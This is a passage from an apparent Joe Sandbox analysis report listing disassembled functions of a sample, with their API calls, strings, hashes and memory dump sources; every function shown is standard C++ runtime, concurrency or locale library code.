                                                                                                        • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation
                                                                                                        • API String ID: 4178755008-3364311089
                                                                                                        • Opcode ID: c19a33cadea05ff340db714aff2210dccf6a4d27633bb4632a12bdaaa2f92f64
                                                                                                        • Instruction ID: 78fb8a04eb7bf5d6e8e387b0e48124d0c4cbeabaef43d27c02b179749c705f33
                                                                                                        • Opcode Fuzzy Hash: c19a33cadea05ff340db714aff2210dccf6a4d27633bb4632a12bdaaa2f92f64
                                                                                                        • Instruction Fuzzy Hash: 02416E72940608ABCB01DF94CD41FDAB7FCEB09710F5086A6E815A7790EB75AA14CB90
                                                                                                        Function 00AB4760 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB47FD
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB482B
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00AB4882
                                                                                                        Strings
                                                                                                        • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00AB4802
                                                                                                        • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00AB47D4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$___std_exception_copy
                                                                                                        • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                                        • API String ID: 4178755008-3345525433
                                                                                                        • Opcode ID: 76c32a20295e9ec073161edfdd21467bb6622b83f49a5d37a4ceaef3d895987d
                                                                                                        • Instruction ID: 756f3c4beaa334be48d8f83fb1ace853516e1dece6edfc99e861dbea5b78685a
                                                                                                        • Opcode Fuzzy Hash: 76c32a20295e9ec073161edfdd21467bb6622b83f49a5d37a4ceaef3d895987d
                                                                                                        • Instruction Fuzzy Hash: 6A419572914209AFCB15EFA4C941BDEF7FCEF09710F0045AAE811A7792EB74A654CB60
                                                                                                        Function 00AF178D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF1794
                                                                                                        • __Getcvt.LIBCPMT ref: 00AF17A2
                                                                                                          • Part of subcall function 00AEA86D: _Maklocstr.LIBCPMT ref: 00AEA88D
                                                                                                          • Part of subcall function 00AEA86D: _Maklocstr.LIBCPMT ref: 00AEA8AA
                                                                                                          • Part of subcall function 00AEA86D: _Maklocstr.LIBCPMT ref: 00AEA8C7
                                                                                                          • Part of subcall function 00AEA86D: _Maklocchr.LIBCPMT ref: 00AEA8D9
                                                                                                          • Part of subcall function 00AEA86D: _Maklocchr.LIBCPMT ref: 00AEA8EC
                                                                                                        • _Mpunct.LIBCPMT ref: 00AF1821
                                                                                                        • _Mpunct.LIBCPMT ref: 00AF183B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Maklocstr$MaklocchrMpunct$GetcvtH_prolog3
                                                                                                        • String ID: $+xv
                                                                                                        • API String ID: 1880433610-1686923651
                                                                                                        • Opcode ID: b9180e3a59780c79fbb91c6ac385ff56d4075219bf13ffa7e3c292f9373f92c2
                                                                                                        • Instruction ID: 5427a9f060f0b2126c2daf50fd74443973bf840465d444c05d71cd58f2ad267b
                                                                                                        • Opcode Fuzzy Hash: b9180e3a59780c79fbb91c6ac385ff56d4075219bf13ffa7e3c292f9373f92c2
                                                                                                        • Instruction Fuzzy Hash: 002171B1904B96AED725DFB9845067B7EF8AB0D700F04095AF559C7A41D734E601CBD0
                                                                                                        Function 00AF9CA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mpunct$GetcvtH_prolog3
                                                                                                        • String ID: $+xv
                                                                                                        • API String ID: 279835032-1686923651
                                                                                                        • Opcode ID: d100960c990b9fff9acc638b05a654b849870428f2334b8844b11cab6ece61cc
                                                                                                        • Instruction ID: ac9d4479d941a38587c5f2b2ee154a3705a3978ee65139ff4f0eb5c4833dd8d7
                                                                                                        • Opcode Fuzzy Hash: d100960c990b9fff9acc638b05a654b849870428f2334b8844b11cab6ece61cc
                                                                                                        • Instruction Fuzzy Hash: CD21B2B1904B566ED725DFB9C89073BBEF8AB0D300F14095AF599C7A41D734EA01CB90
                                                                                                        Function 00B20EFE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B20EAF,?,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002), ref: 00B20F1E
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B20F31
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00B20EAF,?,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002,00000000), ref: 00B20F54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: bd438d5c93d30dfdbb8120f5dfe2845c3ae022858b4da54711b0a1c151382af7
                                                                                                        • Instruction ID: 39ce82932b5a6f45f93c6944759f192ecb0712ecf82b90db0c97e48f18a07061
                                                                                                        • Opcode Fuzzy Hash: bd438d5c93d30dfdbb8120f5dfe2845c3ae022858b4da54711b0a1c151382af7
                                                                                                        • Instruction Fuzzy Hash: 04F0A431510318BBDB116B90DC49B9DBFF4EB04B52F0001E8FD09A2260CF718E55CB80
                                                                                                        Function 00B0E210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00B0E224
                                                                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00B0E248
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B0E25B
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B0E269
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler
                                                                                                        • API String ID: 3657713681-923244539
                                                                                                        • Opcode ID: a92b2411010feb63a6d904ba92d76e1d8e56a1cdc90b25881caa73c584a6f926
                                                                                                        • Instruction ID: 223ee2a2883c4d6ae61f7c283724336c6a48ba06a8a0237120292288b6f0bfd4
                                                                                                        • Opcode Fuzzy Hash: a92b2411010feb63a6d904ba92d76e1d8e56a1cdc90b25881caa73c584a6f926
                                                                                                        • Instruction Fuzzy Hash: 13F0B436A0020467C720FAA4E882DAEBBFDAE90B1471049E9E522671D1DF70ED45C691
                                                                                                        Function 00B30043 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: d48c33568eb71e9125c53420cd59ca2263b908184c0d5e801d91be634d728892
                                                                                                        • Instruction ID: 96c2c234a3dd2640426a3528487cfe428621e7582ebca4a1e1dc53d65368f31a
                                                                                                        • Opcode Fuzzy Hash: d48c33568eb71e9125c53420cd59ca2263b908184c0d5e801d91be634d728892
                                                                                                        • Instruction Fuzzy Hash: 7E41D432A10204AFCB24EF78C991A5EB7E6EF89710F2545E9E515EB391D731AD01CB40
                                                                                                        Function 00B11C52 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B11C86
                                                                                                          • Part of subcall function 00B0CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00B0CB27
                                                                                                        • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00B11CE5
                                                                                                        • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00B11D0B
                                                                                                        • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 00B11D2B
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 00B11D78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
                                                                                                        • String ID:
                                                                                                        • API String ID: 1794448563-0
                                                                                                        • Opcode ID: 260909426080b2b1102296e064316b46fab5bc4125ff33627a152f21e53ffb07
                                                                                                        • Instruction ID: 5cb5a95acb64e7b20dfcdac6cb9d45ca92b5c155f24dc6d128afdd532a1af7f2
                                                                                                        • Opcode Fuzzy Hash: 260909426080b2b1102296e064316b46fab5bc4125ff33627a152f21e53ffb07
                                                                                                        • Instruction Fuzzy Hash: B4411774600210ABCB199B28CC96BEDBBE9EF44750F5484EDE5465B382DF309D85CBD1
                                                                                                        Function 00B0C2A0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _SpinWait.LIBCONCRT ref: 00B0C2C5
                                                                                                          • Part of subcall function 00B02302: _SpinWait.LIBCONCRT ref: 00B0231A
                                                                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00B0C2D9
                                                                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00B0C30B
                                                                                                        • List.LIBCMT ref: 00B0C38E
                                                                                                        • List.LIBCMT ref: 00B0C39D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                        • String ID:
                                                                                                        • API String ID: 3281396844-0
                                                                                                        • Opcode ID: 843b9664fc4a2f408243e90ed7429d2510d754412cbe1433e4414c249134aa6c
                                                                                                        • Instruction ID: f66bc814875fcf13e8f8373ee99dfaf369161a7db2ba0aafad07286713acf3d6
                                                                                                        • Opcode Fuzzy Hash: 843b9664fc4a2f408243e90ed7429d2510d754412cbe1433e4414c249134aa6c
                                                                                                        • Instruction Fuzzy Hash: 39313472901615DFCB14EFA4D5916EDBFF0BF14304F1482AAD80277692CB716E18CBA8
                                                                                                        Function 00B14BB5 Relevance: 7.6, APIs: 5, Instructions: 80threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,00000000,?), ref: 00B14C06
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B14BEE
                                                                                                          • Part of subcall function 00B0CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00B0CB27
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B14C37
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B14C69
                                                                                                        • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,00B8C2F0), ref: 00B14C6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8SwitchThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2412095092-0
                                                                                                        • Opcode ID: 3794dffb74256764b0b7c8b69ac8a493ed0453d1e337d1273e2c6519533c7410
                                                                                                        • Instruction ID: cc0781b7ad7ce8d5352cfac201562b6ea0fb4729a536c52502f8580882589372
                                                                                                        • Opcode Fuzzy Hash: 3794dffb74256764b0b7c8b69ac8a493ed0453d1e337d1273e2c6519533c7410
                                                                                                        • Instruction Fuzzy Hash: C021D475700214AFC710EB98CC85AAEBBECEB48761B500196FA05A32D1CF70AD418AE4
                                                                                                        Function 00B0DDB7 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00B0DDBE
                                                                                                        • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00B0DE0A
                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B0DE20
                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B0DE8C
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B0DE9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::bad_exception::bad_exception$Concurrency::Exception@8H_prolog3_catchPolicyPolicy::_SchedulerThrowValidValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702943636-0
                                                                                                        • Opcode ID: b5ef115a315ee614072f8f72e94ee643056f50cd125835f499f4c0c2dbdbd1fa
                                                                                                        • Instruction ID: 234a2870cc828b6ebca621d2886edd6b5dc396e238d4b16bd49946637dabd262
                                                                                                        • Opcode Fuzzy Hash: b5ef115a315ee614072f8f72e94ee643056f50cd125835f499f4c0c2dbdbd1fa
                                                                                                        • Instruction Fuzzy Hash: 14215E729002159FDF09EFA4D8869ADBBF4EF15310B6040E9F405AF1D1DB71AD45CB50
                                                                                                        Function 00B3C5A4 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C5AD
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C5D0
                                                                                                          • Part of subcall function 00B35B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C5F6
                                                                                                        • _free.LIBCMT ref: 00B3C609
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C618
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 336800556-0
                                                                                                        • Opcode ID: a69f056f7106532d856ebed9cb2a305b193d12462202c6645c1a4b2c6b69b590
                                                                                                        • Instruction ID: bc8271e6b5208fa25717326b147072a94bd395d1f08f1d77a73959f355a51a2c
                                                                                                        • Opcode Fuzzy Hash: a69f056f7106532d856ebed9cb2a305b193d12462202c6645c1a4b2c6b69b590
                                                                                                        • Instruction Fuzzy Hash: BC01B1726057257B272156B65C8ED7BBEEDDAC2FA272411A9FD04E3241EE608D0182B0
                                                                                                        Function 00AEA86D Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Maklocstr$Maklocchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2020259771-0
                                                                                                        • Opcode ID: f46e346910aa6fb414e3e2aed398f96d3730ac55745c4a3ef5cf47e7485e74c9
                                                                                                        • Instruction ID: 8efce273605befad1a619b99f6917bdfe12f61c481cf8a9e4ee0e6485181e80e
                                                                                                        • Opcode Fuzzy Hash: f46e346910aa6fb414e3e2aed398f96d3730ac55745c4a3ef5cf47e7485e74c9
                                                                                                        • Instruction Fuzzy Hash: E111BCB1940780BBE320DBA6D981F12B7ECAB18350F084929F1448B641E274FC4487A6
                                                                                                        Function 00AF869B Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF86A2
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF86AC
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF86FD
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF871D
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF873B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
